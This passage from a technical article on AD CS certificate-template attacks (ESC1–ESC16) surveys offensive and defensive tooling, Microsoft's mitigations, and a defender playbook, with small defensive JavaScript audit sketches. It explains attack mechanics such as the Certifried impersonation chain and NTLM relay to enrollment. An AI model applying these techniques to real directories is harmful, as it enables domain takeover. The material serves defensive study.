    E8["ESC8 Relay to HTTP<br/>SpecterOps 2021"]
    E11["ESC11 Relay to RPC<br/>Compass 2022"]
  end
  subgraph MAP[Mapping]
    E9["ESC9 No SID Ext<br/>IFCR 2022"]
    E10["ESC10 Weak Mapping<br/>IFCR 2022"]
    E13["ESC13 OIDToGroupLink<br/>SpecterOps 2024"]
    E14["ESC14 altSecurityIdentities<br/>SpecterOps 2024"]
  end
  subgraph HW[Hardware]
    E12["ESC12 YubiHSM Substrate<br/>Knobloch 2023"]
  end

The static rules that Certipy, Certify, Locksmith, and PSPKIAudit all run to decide whether a template is ESC1-shaped are simpler than the catalog above might suggest. Four boolean inputs, one conjunction, one output label.

{`
// Labels a template 'ESC1' only when all four conditions hold at once.
function classifyTemplate(t) {
  // Requester may supply the Subject / SAN.
  const ess = t.flags.includes('CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT');
  // Client Authentication EKU is present.
  const clientAuth = t.eku.includes('1.3.6.1.5.5.7.3.2');
  // A low-privilege group holds enrollment rights.
  const lowPriv = t.enroll.some(p => ['Authenticated Users', 'Domain Users'].includes(p));
  // Manager approval is not required.
  const noApproval = !t.flags.includes('CT_FLAG_PEND_ALL_REQUESTS');
  if (ess && clientAuth && lowPriv && noApproval) return 'ESC1';
  return 'safe-for-now';
}

const wifi = {
  flags: ['CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'],
  eku: ['1.3.6.1.5.5.7.3.2'],
  enroll: ['Authenticated Users'],
};
console.log(classifyTemplate(wifi));
`}

6. The 2026 Toolchain

Sixteen ESCs is too many for one tool. The 2026 state of the art is a stack: defenders run Locksmith, PSPKIAudit, BloodHound CE, and Microsoft Defender for Identity in parallel; offense runs Certipy and Certify. No single tool covers every ESC, prioritizes its findings, and produces forensic primitives for response. Coverage gaps are structural, not accidental.

Certify is the original offense-side tool from the SpecterOps team that wrote Certified Pre-Owned. A C# Windows binary that enumerates and abuses AD CS misconfigurations using the operator's in-process credentials [@certify-gh]. Released at Black Hat 2021, built against .NET 4.7.2. Certify covers the ESC1 through ESC16 enumeration surface via its documentation pages [@specterops-certify-docs-index]; abuse implementations exist for the catalog's most operator-friendly entries, with ESC11 documented as enumeration-only at the most recent docs revision [@specterops-esc11-docs].

Certipy is the Linux-side sibling, written in Python by Oliver Lyak at IFCR (now an independent project) [@certipy-gh]. The README carries the strongest coverage claim in the tool community: "full support for identifying and exploiting all known ESC1-ESC16 attack paths." Certipy ships its own NTLM relay (certipy relay), embedded BloodHound output, certificate forging, and PKINIT-to-TGT exchange. The Certipy wiki's privilege-escalation page is the best walking reference for the entire catalog [@certipy-wiki-priv].

BloodHound Community Edition is the only tool in the stack that integrates AD CS findings into the broader Active Directory attack graph. SharpHound CE collects AD CS objects -- CAs, templates, NTAuth membership, per-template DACLs -- and the BloodHound server computes ten ADCSESC*N* edges (ESC1, ESC3, ESC4, ESC6a/b, ESC9a/b, ESC10a/b, ESC13) plus the CoerceAndRelayNTLMToADCS edge that graphs ESC8 via coercion [@bh-llms]. BloodHound CE 7.x added Privilege Zones, which let defenders tag NTAuth CAs and their templates as Tier-Zero objects and surface paths to them in the analysis UI.

The principal-graph model treats each AD object as a node and each access right or trust as an edge. The graph then path-finds from a starting principal to a Tier-Zero target. This model works elegantly for template DACLs (ESC4) and CA DACLs (ESC7) and for issuance-policy group linkage (ESC13). It struggles with attacks where the abuse is a transport-level interaction rather than a principal-to-principal relationship.

ESC8 used to be considered uncatchable in this model. The CoerceAndRelayNTLMToADCS edge solved that: BloodHound CE now models the SMB-coercion-plus-NTLM-relay-to-ESC8 chain as a Group-to-Computer edge whose source is Authenticated Users and whose destination is the coerced target computer; the relay target CA and the template are encoded in the edge's metadata, not as graph nodes [@bh-coerce-adcs-edge]. The edge exists because coercion has a stable shape -- an unauthenticated principal class, a target computer, and an ESC8-vulnerable CA endpoint reachable on the network -- that the graph can express.

ESC11 remains harder. The RPC enrollment transport does not have a stable coercion model (the trigger is ICertPassage packet privacy not being enforced, not a coercion gadget like MS-EFSR), and the BloodHound graph today does not ship an ADCSESC11 edge. The model limit is partial, not total. The conventional "BloodHound cannot graph transport attacks" framing -- which was the prevailing folklore through 2024 -- is wrong; ESC8 is in the graph. ESC11 is the open structural case.

Locksmith is a PowerShell defender tool by Jake Hildreth (with Spencer Alessi) [@locksmith-gh]. It runs locally on a domain-joined host and reports template, CA, and NTAuth-container findings against the catalog. Modes 0 through 4: identify-and-report, auto-remediate where safe, produce a CSV, and so on. The lowest-friction defender tool in the stack -- a single Invoke-Locksmith cmdlet returns a triage list against the published ESC range.

PSPKIAudit is the SpecterOps team's own defender baseline, built on top of PKI Solutions' PSPKI module [@pspkiaudit-gh]. Its Invoke-PKIAudit and Get-CertRequest cmdlets cover ESC1 through ESC8 plus the "Explicit Mappings" surface for ESC14. The README is marked beta; PSPKIAudit predates Locksmith and ships fewer remediation primitives, but it is the canonical reference for what the original SpecterOps team thinks the defensive audit should do.

Microsoft Defender for Identity ships the ADCS posture assessment suite when the MDI sensor is installed on the CA itself [@mdi-certs]. The current product surface assesses nine ESCs by name: ESC1 (Preview), ESC2, ESC3, ESC4 (split across two separate assessments -- template owner and template ACL), ESC6 (Preview), ESC7, ESC8, ESC11, and ESC15. The product page is explicit: "This assessment is available only to customers who have installed a sensor on an AD CS server." MDI's coverage is broad and operationally integrated -- the same SOC console that surfaces Pass-the-Hash detections now surfaces the largest named-ESC posture-assessment suite of any non-Certipy tool in the stack, with the ESC1 and ESC6 assessments shipped in Preview state.

The KB5014754 strong-mapping track is Microsoft's runtime mitigation rather than a tool, but operationally it belongs in the stack discussion because it is the largest single thing Microsoft has shipped for this class [@kb5014754]. Strong mapping closes ESC9 and ESC10 (plus Certifried CVE-2022-26923) under Full Enforcement, defaults to Compatibility through February 11, 2025, and removes the legacy-mapping registry override on September 9, 2025. Operationally this is a deployment decision more than a "tool to run", but every defender stack has to plan for it; the Microsoft Tech Community Intune blog is the cross-reference for environments using SCEP or PKCS [@ms-tc-intune].

The Hacker Recipes AD CS chapter is a community reference catalog rather than a runnable tool; it serves as the canonical operator-facing summary of every ESC and is worth bookmarking. (Network reachability of the canonical URL has been inconsistent in late 2025 / 2026.)

Here is a single-table comparison of the practical stack. The right answer for a real enterprise is roughly "all of them in parallel"; the table makes the coverage gaps explicit.

Tool / track	Language	ESC enumeration coverage	Abuse capable	Graph capable	Best deployed for	Source
Certify	C# (Windows)	ESC1 to ESC16 (per docs)	Yes (most)	No	Operator chains, Windows offense	[@certify-gh]
Certipy	Python (Linux)	ESC1 to ESC16 (README claim)	Yes	Embedded	Operator chains, Linux offense	[@certipy-gh]
BloodHound CE ADCS edges	Cypher	8 of 16 ESCs (11 edges: ten ADCSESCN + CoerceAndRelayNTLMToADCS)	No	Yes	Prioritization, attack-path analysis	[@bh-llms]
Locksmith	PowerShell	Published ESC catalog	Identify and fix	No	Operational scans on each CA	[@locksmith-gh]
PSPKIAudit	PowerShell	ESC1 to ESC8 plus Explicit Mappings	No (read-only)	No	Defender baseline, audit	[@pspkiaudit-gh]
MDI ADCS posture	SaaS	ESC1 (Preview), ESC2, ESC3, ESC4, ESC6 (Preview), ESC7, ESC8, ESC11, ESC15	No	Inside MDI console	SOC integration, posture scoring	[@mdi-certs]
KB5014754 strong mapping	Windows runtime	ESC9, ESC10, Certifried (mitigation)	n/a	n/a	Domain Controllers (deploy)	[@kb5014754]

Note: For most enterprises the realistic configuration is: Locksmith scheduled monthly on every CA; BloodHound CE with the ADCS collector enabled in SharpHound CE; Microsoft Defender for Identity sensor on every AD CS server (for the nine-ESC SOC visibility surface that now includes ESC1 and ESC6 in Preview); PSPKIAudit run once a quarter as the SpecterOps-blessed baseline; Certipy in the red-team or purple-team kit; and KB5014754 Full Enforcement verified on every Domain Controller (the default since February 11, 2025, with the legacy-mapping override removed on September 9, 2025). The remaining gap items -- ESC5, ESC12, ESC14, and ESC16 (neither in BloodHound's principal graph nor in MDI's posture-assessment surface) -- are caught by Locksmith plus PSPKIAudit plus Certipy plus careful template review.
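The gap list in the note above is a set difference over the per-tool coverage stated in this section. A minimal sketch, with the coverage lists transcribed from the text rather than queried from the tools; the object keys and function name are illustrative, and the lists should be edited to match whatever versions you actually run.

```javascript
// ESC coverage per tool, transcribed from this section.
const coverage = {
  bloodhoundCE: ['ESC1', 'ESC3', 'ESC4', 'ESC6', 'ESC8', 'ESC9', 'ESC10', 'ESC13'],
  defenderForIdentity: ['ESC1', 'ESC2', 'ESC3', 'ESC4', 'ESC6', 'ESC7', 'ESC8', 'ESC11', 'ESC15'],
};

// Returns every ESC in 1..total that no listed tool covers.
function escsWithoutCoverage(coverageByTool, total = 16) {
  const seen = new Set(Object.values(coverageByTool).flat());
  const gaps = [];
  for (let n = 1; n <= total; n++) {
    const esc = `ESC${n}`;
    if (!seen.has(esc)) gaps.push(esc);
  }
  return gaps;
}

console.log(escsWithoutCoverage(coverage));
```

Adding a third key for Locksmith or PSPKIAudit shows how quickly the gap closes once the scanners are layered on top of the graph and SOC tools.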

If no single tool covers everything, what is Microsoft actually doing about it?

7. What Microsoft Has Actually Shipped

Across the sixteen named ESCs, Microsoft has shipped two CVE-class binary patches: CVE-2022-26923 and CVE-2024-49019. Everything else is hardening guidance or, in the case of KB5014754, a staged runtime enforcement change. The asymmetry is not accidental; it tracks the boundary Microsoft draws in its Windows Security Servicing Criteria between default-state vulnerabilities (which receive CVEs and binary patches) and admin-configurable misconfigurations (which receive documentation). Most ESCs sit on the configurable side of that boundary.

Four Microsoft mitigation tracks define the response, in order of when they shipped.

KB5005413 (late July 2021) -- NTLM Web Enrollment hardening. Published roughly six weeks after Certified Pre-Owned in response to PetitPotam plus the SpecterOps ESC8 disclosure [@kb5005413]. Recommends enabling Extended Protection for Authentication, requiring SSL on the /certsrv/ virtual directories of AD CS Web Enrollment and the Certificate Enrollment Web Service, and disabling NTLM where Kerberos is available. Crucially: KB5005413 is guidance, not a binary patch. Environments that never enabled EPA on /certsrv/ remain exploitable today. The KB closes ESC8 over HTTPS when fully applied; it does not affect ESC11 (RPC), ESC1 through ESC7, or anything in the ESC9-plus range.

CVE-2022-26923 (May 10, 2022) -- Certifried. The single MSRC-acknowledged CVE in the original ESC1 through ESC8 design space [@cve-2022-26923-nvd] [@cve-2022-26923-msrc]. Disclosed by Oliver Lyak at IFCR [@lyak-certifried], the vulnerability lets any Authenticated User (because the default ms-DS-MachineAccountQuota is 10 [@semperis-cve]) create a computer account, write its dNSHostName to match a Domain Controller, request a certificate from the default Machine template, and PKINIT as the DC. Microsoft patched it on the May 10, 2022 Patch Tuesday. Semperis's retrospective documents the chain in detail [@semperis-cve]. The patch closes that specific path -- the dNSHostName impersonation chain -- and shipped on the same Patch Tuesday as KB5014754. It does not close any other ESC.

KB5014754 (May 10, 2022 -- present) -- the strong-mapping rollout. The largest single Microsoft mitigation in the entire class [@kb5014754]. SpecterOps's own analysis -- "Certificates and Pwnage and Patches, Oh My!" -- remains the canonical walkthrough of how the new behavior interacts with the existing catalog [@specterops-pwnage].

The mechanics: KB5014754 introduces the szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2), embeds the requester's SID into every issued certificate by default, and redefines which altSecurityIdentities mappings the KDC will accept. Deployment is staged across three modes -- Disabled, Compatibility, and Full Enforcement -- with the Full Enforcement transition originally planned for November 2023, then repeatedly delayed in response to customer compatibility issues with SCEP, Intune PKCS, and non-Microsoft PKIs. The KB's current text states that Full Enforcement becomes the default on February 11, 2025, and the legacy compatibility-mode registry override is removed by the September 9, 2025 Windows security update [@kb5014754].

What it closes: ESC9 (because Full Enforcement rejects certificates lacking the SID extension), ESC10 (because weak mappings are rejected), and Certifried even on unpatched templates. It is bypassed by ESC16, which disables the SID extension at the CA level.
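The mapping redefinition can be sketched as a classifier over altSecurityIdentities strings. The strong and weak groupings below follow the mapping-type table in KB5014754 (issuer plus serial number, SKI, and SHA1 public key are strong; issuer plus subject, subject only, and RFC822 are weak). The function name and sample values are hypothetical, and the tag parsing is deliberately naive.

```javascript
// Classifies one altSecurityIdentities value as 'strong' or 'weak'
// per the mapping types listed in KB5014754.
function classifyAltSecId(value) {
  // Collect the tag names, e.g. "X509:<I>...<SR>..." -> {I, SR}.
  const tags = new Set([...value.matchAll(/<([A-Z0-9-]+)>/g)].map(m => m[1]));
  if (tags.has('I') && tags.has('SR')) return 'strong'; // X509IssuerSerialNumber
  if (tags.has('SKI')) return 'strong';                 // X509SKI
  if (tags.has('SHA1-PUKEY')) return 'strong';          // X509SHA1PublicKey
  return 'weak'; // issuer+subject, subject-only, RFC822, or anything unrecognized
}

// Placeholder values for illustration only.
console.log(classifyAltSecId('X509:<I>DC=local,DC=corp,CN=ExampleCA<SR>1200000000AC11000000002B'));
console.log(classifyAltSecId('X509:<I>DC=local,DC=corp,CN=ExampleCA<S>CN=admin'));
console.log(classifyAltSecId('X509:<RFC822>admin@corp.local'));
```

Treating unrecognized formats as weak is a conservative choice for an audit: it surfaces entries for review rather than silently passing them.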

CVE-2024-49019 (EKUwu / ESC15) -- November 12, 2024. Patched thirty-five days after Bollinger's October 8, 2024 disclosure [@bollinger-ekuwu]. The November 12, 2024 Patch Tuesday addressed the V1 WebServer template Application-Policies override [@cve-2024-49019-nvd] [@cve-2024-49019-msrc]. The patch hardens the KDC's interpretation of Application Policies in V1 certificates; it does not close ESC16, ESC11, or anything in the template DACL space.

Note: Microsoft's Windows Security Servicing Criteria reserves CVEs for vulnerabilities in default product state [@msrc-servicing-criteria]. Misconfigurations that require administrator action to introduce are treated as hardening matters and receive documentation rather than CVEs. The 2019 ANSSI altSecurityIdentities report received a "won't fix" response on exactly these grounds [@dedrouas-altsec]. The boundary explains the catalog's CVE asymmetry: ESC1 (a template flag) is configuration; Certifried (a default template interacting with a default account-creation permission) is a CVE. ESC15 sat on the boundary -- the affected template is shipped pre-installed and cannot be uninstalled, so its default-state status could be argued either way -- and Microsoft chose to issue a CVE. The boundary is operational policy, not a technical limit; it can move.

The single most useful table in this article is the cross-reference of which Microsoft mitigation closes which ESC. Read row by row to understand which ESCs are runtime-closed in a hardened environment and which remain dependent on the customer's administrative hardening discipline.

ESC	KB5005413 (2021)	CVE-2022-26923 (2022)	KB5014754 (2022-2025)	CVE-2024-49019 (2024)	Hardening only
ESC1	--	--	Partial (SID ext defeats SAN supply for cert-authn)	--	Primary mitigation
ESC2	--	--	--	--	Yes
ESC3	--	--	Partial (SID ext binds the cert to the agent)	--	Yes
ESC4	--	--	--	--	Yes
ESC5	--	--	--	--	Yes
ESC6	--	--	Partial (SID ext defeats requested SAN)	--	Primary
ESC7	--	--	--	--	Yes
ESC8 (HTTP)	Closed when EPA + SSL deployed	--	--	--	Continues if EPA off
ESC9	--	--	Closed at Full Enforcement	--	Until Feb 2025
ESC10	--	--	Closed at Full Enforcement	--	Until Feb 2025
ESC11 (RPC)	--	--	--	--	Primary (`IF_ENFORCEENCRYPTICERTREQUEST` flag)
ESC12	--	--	--	--	Primary (HSM hardening)
ESC13	--	--	--	--	Yes
ESC14	--	--	--	--	Yes
ESC15	--	--	--	Closed (Nov 12, 2024)	--
ESC16	--	--	Bypassed (this attack disables the extension)	--	Primary

Of sixteen ESCs, one (ESC15, EKUwu) is closed by a CVE-class binary patch, one (ESC8) is closed by the KB5005413 hardening guidance when it is fully applied, two (ESC9 and ESC10) are runtime-closed under KB5014754 Full Enforcement, and the remaining twelve are administrative hardening matters. Certifried, the other CVE in this class, is not a numbered ESC. If so few of the sixteen have CVEs, what stops the catalog from growing forever?

8. The Two-Trust-Roots Problem

What stops the catalog from growing forever is the architectural property the catalog enumerates around but cannot eliminate. The catalog grows because the property is structural, not because the engineering is sloppy. Four pieces of theory anchor the limit.

Two trust roots. Active Directory's Kerberos KDC will mint a Domain Admin Ticket-Granting Ticket on presentation of any valid certificate signed by a CA in the forest's NTAuthCertificates container, provided the certificate maps to the Administrator principal. The krbtgt key is the symmetric root of trust for password and TGS authentication; an NTAuth CA's private key is an asymmetric root of trust for PKINIT. There is no architectural relationship between the two. Rotating the krbtgt key does not invalidate any certificate. Revoking a CA does not invalidate krbtgt-issued tickets. They are independent authenticator-minting keys. For a forest with $n$ NTAuth-published CAs, the count of independent keys that can mint a Domain Admin authenticator is $n + 1$.

Key idea: For an Active Directory forest with $n$ Certificate Authorities published into NTAuthCertificates, there are exactly $n + 1$ independent keys that can mint a Domain Admin authenticator: the krbtgt account hash, and the private key of every published CA. Rotating krbtgt closes one root. Revoking one CA closes another. The other $n - 1$ remain. The ESC catalog enumerates how an attacker can make those keys issue a Domain Admin authenticator with low-privilege materials; the architectural property -- that there are $n + 1$ such keys at all -- is a design property of PKINIT and is not closable by any patch [@rfc4556] [@cpo-whitepaper].
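As a worked instance of the count, with $n = 3$ chosen purely for illustration:

$$
\underbrace{1}_{\text{krbtgt}} + \underbrace{n}_{\text{NTAuth CAs}} = n + 1 = 4, \qquad (n + 1) - 1 - 1 = n - 1 = 2 .
$$

A forest with three NTAuth-published CAs starts with four authenticator-minting keys. Rotating krbtgt and revoking one CA addresses two of them; the two remaining CA keys are untouched by either action.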

PKINIT's binding gap. RFC 4556 specifies how a Kerberos client presents a certificate and receives a TGT [@rfc4556]. The RFC does not bind the certificate to a Microsoft SID; the mapping from certificate to AD principal is a Microsoft extension. The KB5014754 strong-mapping track closes the mapping ambiguity by embedding the requester's SID into the certificate and matching the SID on the KDC side [@kb5014754]. It does not close the underlying primitive: a certificate is an alternate identity assertion that the KDC honors as long as the signing CA is trusted. Different ESCs find different ways to get a useful certificate; the authentication step is identical across the catalog.

The transport-versus-principal split. The §6 BloodHound Aside develops this in full: BloodHound's principal-graph model now expresses ESC8 as the CoerceAndRelayNTLMToADCS edge, but ESC11 remains the open structural case because the RPC transport has no equivalent coercion gadget [@bh-coerce-adcs-edge]. The model limit is partial, not total -- it applies to RPC, not to all transport attacks.

The configuration-versus-CVE boundary. The §7 Callout develops this in full. The catalog has accumulated CVEs only when Microsoft judged the configuration was default-state -- Certifried's machine-account-quota path and ESC15's pre-installed V1 templates. The boundary, unlike the architectural property, is policy-driven and movable.

Active Directory has two trust roots that can mint a Domain Admin authenticator: the krbtgt key, and any CA published into NTAuth. Rotating one does not touch the other.

The architectural property reshapes how operators should think about the catalog. The catalog is not an arms race that ends; the catalog is the community mapping the surface of a design property of PKINIT. Each new ESC narrows the description of what surface remains exposed; no plausible patch removes the underlying $n + 1$ key count. Until PKINIT itself is replaced -- until PKINIT is deprecated, until the KDC stops accepting certificate-based authentication, until NTAuth-published CAs lose their KDC trust -- every NTAuth-published CA in the forest is a key parallel to krbtgt.

If the architectural limit cannot be closed, what are the open questions in 2026?

flowchart LR
    K["krbtgt account hash<br/>symmetric KDC key"]
    CA1["CA #1 private key<br/>published in NTAuth"]
    CA2["CA #2 private key<br/>published in NTAuth"]
    CAN["CA #n private key<br/>published in NTAuth"]
    KDC["Kerberos KDC<br/>and PKINIT"]
    AUTH["Domain Admin<br/>authenticator TGT"]
    K --> KDC
    CA1 --> KDC
    CA2 --> KDC
    CAN --> KDC
    KDC --> AUTH

9. Open Problems and the Catalog's Closure

The catalog has no published closure principle. Here are the five open frontiers in 2026.

No closure principle. The catalog has grown every year since 2021: ESC1 through ESC8 in June 2021; ESC9 and ESC10 in August 2022; ESC11 in November 2022; ESC12 in October 2023 [@knobloch-esc12] [@knobloch-esc12-archive]; ESC13 and ESC14 in February 2024; ESC15 in October 2024; ESC16 named in 2025 against a workaround from 2022 [@specterops-esc16-docs]. ESC15 revealed a twenty-four-year-old default behavior on V1 templates -- behavior that had been quietly present since the role's 2000 shipping date [@bollinger-ekuwu]. The Certify documentation conjectures an upper bound (the six primitive categories times the misconfigurable bits per primitive) but no formal upper bound is published. ESC15 is itself an existence proof that new categories still emerge: Application Policies as a parallel to standard EKU was not in the original 2021 catalog at all.

Detection asymmetry. Most ESCs leave artifacts on the CA -- specifically Event ID 4886 (certificate request submitted) and Event ID 4887 (certificate issued) -- and no artifact in the standard Active Directory event stream. Most SIEMs do not ingest CA logs, because CA logs were never on the standard Tier-Zero ingest checklist. The result is that the CA's own audit log carries the only reliable forensic primitive for the entire catalog, and that log is in a place the SOC does not look. Locksmith and PSPKIAudit can identify the misconfigurations but cannot tell you whether they have been exploited; that signal lives in the CA's audit log alone.

Strong-mapping migration risk. The KB5014754 staged rollout entered Full Enforcement on February 11, 2025, and the September 9, 2025 update removed the legacy compatibility-mode registry override [@kb5014754]. Environments with legacy SCEP gateways, third-party PKI vendors, Intune PKCS profiles without strong mapping, or smart cards issued by non-Microsoft CAs face a real risk that legitimate authentication breaks under Full Enforcement. The Microsoft Tech Community Intune guidance is the operational reference for the SCEP/PKCS path [@ms-tc-intune]. The migration is a security upgrade and a deployment minefield in the same package; environments that deferred the rollout past September 9, 2025 lost the legacy override and were forced into Full Enforcement by an OS update they did not opt into.

Note: Per the live KB5014754 text on Microsoft Support: "By February 2025, if the StrongCertificateBindingEnforcement registry key is not configured, domain controllers will move to Full Enforcement mode" and "the option to move back to Compatibility mode will remain until the September 9, 2025, Windows security update is installed" [@kb5014754]. Environments that have not finished the strong-mapping rollout by those dates -- particularly those with non-Microsoft PKI in the chain, including legacy SCEP / Intune PKCS / smart-card vendors -- should plan for breakage and have a rollback plan ready.

Cloud PKI. Entra-managed Cloud PKI changes the substrate: the issuing CA is Microsoft-operated, the template surface is partially exposed to administrators, and the trust relationship between Cloud PKI and on-premises Active Directory is itself a configurable bridge. The community has not yet published an ESC catalog for Cloud PKI; the on-premises catalog is on-prem-specific and does not transfer directly. The open question is whether the Cloud PKI substrate has its own equivalent primitives (a CA-side "this template is configured with ESS-equivalent behavior") that just have not yet been named.

The NTLM dependency in ESC8 and ESC11. Both ESC8 and ESC11 depend on NTLM authentication being available between the coerced computer and the CA host. Microsoft's stated direction is to disable NTLM by default in future Windows releases (the "NTLM disablement" track) [@ms-ntlm-evolution]. If that direction completes, ESC8 and ESC11's relay primitives lose their substrate -- not because the AD CS transport hardens, but because there is no NTLM authentication to relay. The rest of the catalog -- the template, ACL, mapping, and CA-configuration ESCs -- does not depend on NTLM and is unaffected by NTLM disablement.

Taken together, these results suggest the catalog's growth trajectory is structural. The reason ESC15 surfaced a twenty-four-year-old default is not that the SpecterOps team was lazy in 2021; it is that the surface is so large that systematic enumeration of every cross-product (six primitives multiplied by the configurable bits per primitive) is itself a research program. Knowing the architectural limits and the open problems, here is the operational playbook.

10. The Four-Lane Playbook

Here is what an enterprise security program actually does, in four lanes. Lane discipline matters because the catalog rewards parallel work: a single quarter spent only on Lane 1 leaves you detection-blind, and a single quarter spent only on Lane 2 leaves you remediation-paralyzed.

Lane 1: Preventive hygiene

Run Locksmith and PSPKIAudit on every Enterprise CA at least monthly [@locksmith-gh] [@pspkiaudit-gh]. Both tools enumerate the published catalog and produce a triage list. The defender baseline these tools encode is roughly:

Template ACL audit. Confirm that no non-Tier-Zero principal holds WriteDacl, WriteOwner, WriteProperty, or GenericAll on any V2 template.
CA security descriptor audit. Confirm that Manage CA and Issue and Manage Certificates are held only by Tier-Zero principals.
ESS audit. Confirm that no template enrollable by Authenticated Users or Domain Users has CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set with Client Authentication EKU and no Manager Approval.
CA registry audit. Confirm that EDITF_ATTRIBUTESUBJECTALTNAME2 is not set, and IF_ENFORCEENCRYPTICERTREQUEST is set.
SID extension audit. Confirm that szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) is not present in any CA's DisableExtensionList registry value -- closing the ESC16 path.
Manager Approval on sensitive templates. Confirm that any template with privileged EKU sets has Manager Approval.
Least-privilege Enroll. Confirm that Domain Users-equivalent groups do not hold Enroll or Autoenroll on sensitive templates.
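Several of the checks above reduce to bit tests and list membership. The following is a minimal sketch, assuming the template and CA configuration have already been exported into plain objects. The object shapes (`nameFlag`, `enrollmentFlag`, `ekus`, `lowPrivEnroll`, `editFlags`, `interfaceFlags`, `disableExtensionList`) and the function names are hypothetical, and the numeric flag values are assumptions that should be verified against Microsoft's published constants before use. It is not how Locksmith or PSPKIAudit implement their checks.

```javascript
// Flag values are assumptions; verify against Microsoft's documented constants.
const CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001; // template name flag
const CT_FLAG_PEND_ALL_REQUESTS = 0x00000002;         // template enrollment flag (Manager Approval)
const EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000;    // CA EditFlags
const IF_ENFORCEENCRYPTICERTREQUEST = 0x00000200;     // CA InterfaceFlags
const OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2";          // Client Authentication EKU
const OID_NTDS_CA_SECURITY_EXT = "1.3.6.1.4.1.311.25.2";

// Hypothetical input shape: { nameFlag, enrollmentFlag, ekus, lowPrivEnroll }
function auditTemplate(template) {
  const findings = [];
  const ess = (template.nameFlag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) !== 0;
  const managerApproval = (template.enrollmentFlag & CT_FLAG_PEND_ALL_REQUESTS) !== 0;
  const clientAuth = template.ekus.includes(OID_CLIENT_AUTH);
  if (template.lowPrivEnroll && ess && clientAuth && !managerApproval) {
    findings.push("ESS audit: enrollee-supplied subject, Client Authentication, no Manager Approval");
  }
  return findings;
}

// Hypothetical input shape: { editFlags, interfaceFlags, disableExtensionList }
function auditCa(ca) {
  const findings = [];
  if ((ca.editFlags & EDITF_ATTRIBUTESUBJECTALTNAME2) !== 0) {
    findings.push("CA registry audit: EDITF_ATTRIBUTESUBJECTALTNAME2 is set");
  }
  if ((ca.interfaceFlags & IF_ENFORCEENCRYPTICERTREQUEST) === 0) {
    findings.push("CA registry audit: IF_ENFORCEENCRYPTICERTREQUEST is not set");
  }
  if (ca.disableExtensionList.includes(OID_NTDS_CA_SECURITY_EXT)) {
    findings.push("SID extension audit: szOID_NTDS_CA_SECURITY_EXT is disabled");
  }
  return findings;
}
```

An empty array from both functions means the object passed these particular checks only; the ACL-based items in the list need the security descriptors, which this sketch does not model.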

Lane 2: Detection deployment

Ingest the CA's own Security event log into the SIEM. The two load-bearing events are 4886 ("Certificate Services received a certificate request") and 4887 ("Certificate Services approved a certificate request and issued a certificate"). These events are what fire when an operator chain like the cold-open in section one executes. They are the only AD CS event stream the SOC needs to detect the entire issuance side of the catalog.
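Once those two events reach the SIEM, the first useful join is request-to-issuance. The sketch below assumes the events have already been parsed into objects in chronological order; the field names (`eventId`, `requestId`, `requester`) are hypothetical and would need mapping to whatever the SIEM's parser emits.

```javascript
// Hypothetical parsed-event shape: { eventId, requestId, requester }
// Pairs each 4887 (issued) with its earlier 4886 (submitted) by request ID.
function issuedRequests(events) {
  const submitted = new Map();
  const issued = [];
  for (const event of events) {
    if (event.eventId === 4886) {
      submitted.set(event.requestId, event);
    } else if (event.eventId === 4887) {
      const request = submitted.get(event.requestId);
      issued.push({
        requestId: event.requestId,
        requester: request ? request.requester : event.requester,
        sawSubmission: request !== undefined,
      });
    }
  }
  return issued;
}
```

An issuance with `sawSubmission` false is not itself evidence of abuse; it may only mean the 4886 record fell outside the ingest window.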

Enable Microsoft Defender for Identity sensors on every AD CS server. MDI now ships nine named ESC posture assessments -- ESC1 (Preview), ESC2, ESC3, ESC4 (template owner and template ACL as two separate assessments), ESC6 (Preview), ESC7, ESC8, ESC11, and ESC15 -- and surfaces them in the same console the SOC uses for the rest of Active Directory [@mdi-certs]. The ADCS-resident sensor is the only MDI sensor that produces these particular assessments; environments running MDI on Domain Controllers only do not get the AD CS surface.

Run SharpHound CE with the AD CS collection options enabled and ingest the resulting graph into BloodHound CE. Tag NTAuth-published CAs and their pre-installed sensitive templates as Tier Zero in BloodHound's Privilege Zones. Run the analysis layer's Shortest Paths to Tier Zero query weekly; ESC1, ESC3, ESC4, ESC6a/b, ESC9a/b, ESC10a/b, and ESC13 will surface as edges, along with CoerceAndRelayNTLMToADCS paths for any ESC8-vulnerable HTTP enrollment endpoint [@bh-llms] [@bh-coerce-adcs-edge].

Schedule Locksmith on a recurring cadence with output to a triage queue. Locksmith is the lowest-friction defender tool; it identifies and (with mode 1) optionally fixes published-catalog findings with a single cmdlet.

Lane 3: Confirmed-compromise response

This lane carries the article's load-bearing operational claim. If a CA's private key is suspected compromised -- whether through ESC12 hardware-substrate compromise, through ntdsutil-equivalent CA export, or through a vendor compromise of the HSM -- the recovery path is not "rotate krbtgt" and not "revoke the affected certificates". The recovery path is multi-week:

Revoke the CA's published certificate chain.
Decommission the CA (remove the role service, delete the CA private key store, retire the host).
Build a replacement CA on new hardware with a new key.
Publish the new CA into NTAuthCertificates.
Distrust the old CA's certificates throughout the forest (publish an updated CRL, push it to relying parties via Group Policy, and retire every certificate issued by the compromised CA).
Re-issue every credential that depended on the compromised CA.

This operation is analogous in scale and duration to a forest rebuild for krbtgt compromise -- a multi-week IR project, not a one-day patch. The reason is the two-trust-roots property: revoking the CA closes only one of the $n + 1$ keys; if the operator already minted Golden Certificates against the CA's private key, those certificates outlive the revocation unless every issued serial is on the CRL and every relying party has a fresh CRL fetch policy.
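The "every issued serial is on the CRL" condition can be checked as a set difference. This is a minimal sketch assuming the issued-certificate inventory and the current CRL have both been exported as arrays of serial-number strings; the function name and input format are hypothetical.

```javascript
// Returns the issued serial numbers that the CRL does not yet cover.
function unrevokedSerials(issuedSerials, crlSerials) {
  const revoked = new Set(crlSerials);
  return issuedSerials.filter(serial => !revoked.has(serial));
}
```

The check only covers serials the CA database knows about, so an empty result is a necessary condition for a clean state rather than proof of one.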

